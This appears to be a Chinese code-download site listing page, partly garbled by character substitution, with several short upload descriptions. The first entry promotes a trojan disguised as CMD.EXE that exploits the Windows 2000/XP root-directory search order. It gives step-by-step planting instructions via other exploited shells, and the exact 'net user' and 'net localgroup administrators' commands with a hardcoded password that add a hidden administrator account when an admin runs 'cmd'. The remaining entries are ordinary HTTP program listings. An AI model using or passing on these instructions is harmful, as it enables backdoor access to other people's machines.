你是不是經(jīng)常在開始菜單的運(yùn)行窗口里運(yùn)行命令呢? 看看這個(gè)漏洞: Http://zdnet.com /2100-1105-964057.html win2000和xp在執(zhí)行搜索的時(shí)候, 首先查找根目錄 而開始菜單的運(yùn)行窗口里執(zhí)行命令, 也是首先在系統(tǒng)盤的根目錄里進(jìn)行查找. 這個(gè)漏洞其實(shí)是已經(jīng)是公開的秘密了. 既然現(xiàn)在作為漏洞公布出來, 我也就把網(wǎng)上的PasswordReminder.cpp拿來改了改 加了一個(gè)加超級(jí)管理員用戶和執(zhí)行cmd.exe的功能. 使用方法: 把程序解壓, 把壓縮包里的文件 CMD.EXE (該文件具有隱藏和只讀屬性) 釋放到目標(biāo)機(jī)器的系統(tǒng)盤根目錄, 一般都是在C:比如利用UNICODE/Decode漏洞就有寫根目錄的權(quán)限, 同時(shí)Asp/fp30reg.dll等遠(yuǎn)程溢出出來的Shell, 一般都只有匿名權(quán)限, 但是它具有寫根目錄的權(quán)限 這個(gè)時(shí)候, 就可以把本程序放到目標(biāo)機(jī)器的系統(tǒng)盤根目錄 只要等管理員在機(jī)器的開始菜單里運(yùn)行命令: cmd 一切盡在掌握中.:) PS: 系統(tǒng)執(zhí)行后, 會(huì)先產(chǎn)生一個(gè)線程來做一些處理 然后用system()函數(shù)調(diào)用cmd.exe來讓用戶能夠執(zhí)行命令. 產(chǎn)生出來的線程會(huì)產(chǎn)生兩個(gè)進(jìn)程序執(zhí)行如下兩個(gè)命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 這樣就在系統(tǒng)上增加了一個(gè)超級(jí)
標(biāo)簽: 964057 zdnet Http 2100
上傳時(shí)間: 2015-01-12
上傳用戶:qlpqlq
Http協(xié)議下的文件傳輸程序
標(biāo)簽: Http 協(xié)議 文件傳輸 程序
上傳時(shí)間: 2015-01-12
上傳用戶:784533221
機(jī)器人的實(shí)時(shí)控制。VxWork,Windows系統(tǒng)在機(jī)器人控制方面的應(yīng)用。鏈接來自 Http://www.automationit.hut.fi
標(biāo)簽: automationit Windows VxWork Http
上傳時(shí)間: 2015-01-12
上傳用戶:Miyuki
ERWIN絕好的數(shù)據(jù)庫建模工具,可以把數(shù)據(jù)模型導(dǎo)入數(shù)據(jù)庫如sql server foxpro等這里是方法指南更多內(nèi)容可以去Http://erwin.softwarechn.com/_script/showfull.asp?Board=method&Tabname=erwin
標(biāo)簽: softwarechn server foxpro script
上傳時(shí)間: 2013-12-06
上傳用戶:c12228
軟件名稱 銳通大型電子購物系統(tǒng) 運(yùn)行環(huán)境 ASP環(huán)境 軟件語言 國產(chǎn)軟件 整理時(shí)間 2004-8-15 15:07:33 軟件類型 ASP源碼 程序主頁 Http://xrlt.yeah.net 授權(quán)方式 免費(fèi)軟件 聯(lián)系作者 Http://www.idler-et.com/comic-et/home/ 軟件大小 663 KB 界面預(yù)覽 沒有預(yù)覽圖片 軟件等級(jí) 解壓密碼 本站默認(rèn)解壓密碼:www.ttxx.com 下載統(tǒng)計(jì) 本日下載:3 本周下載:4 本月下載:11 總共下載:170 ∷軟件簡介∷ 完全仿照8848網(wǎng)站設(shè)計(jì)的網(wǎng)上購物系統(tǒng),功能真夠強(qiáng)大,不必做太多的說明,如果你去過8848,便會(huì)對(duì)此有比較深刻的了解。
上傳時(shí)間: 2013-12-23
上傳用戶:xzt
Http代理服務(wù)器
上傳時(shí)間: 2014-01-17
上傳用戶:sunjet
--八、設(shè)置Http應(yīng)答頭.
標(biāo)簽: Http
上傳時(shí)間: 2015-01-19
上傳用戶:coeus
基于Winsock2的支持?jǐn)帱c(diǎn)續(xù)傳和SOCKS代理的Http下載類 CHttpDownload
標(biāo)簽: CHttpDownload Winsock2 SOCKS Http
上傳時(shí)間: 2013-12-18
上傳用戶:希醬大魔王
包含常用Internet協(xié)議TCP,UDP、Http、FTP、Telnet等,此版本新增加一個(gè)THttpServ構(gòu)件
標(biāo)簽: Internet Telnet Http FTP
上傳時(shí)間: 2014-08-16
上傳用戶:851197153
利用java開發(fā)Http客戶端的程序
上傳時(shí)間: 2013-12-22
上傳用戶:sxdtlqqjl
蟲蟲下載站版權(quán)所有 京ICP備2021023401號(hào)-1
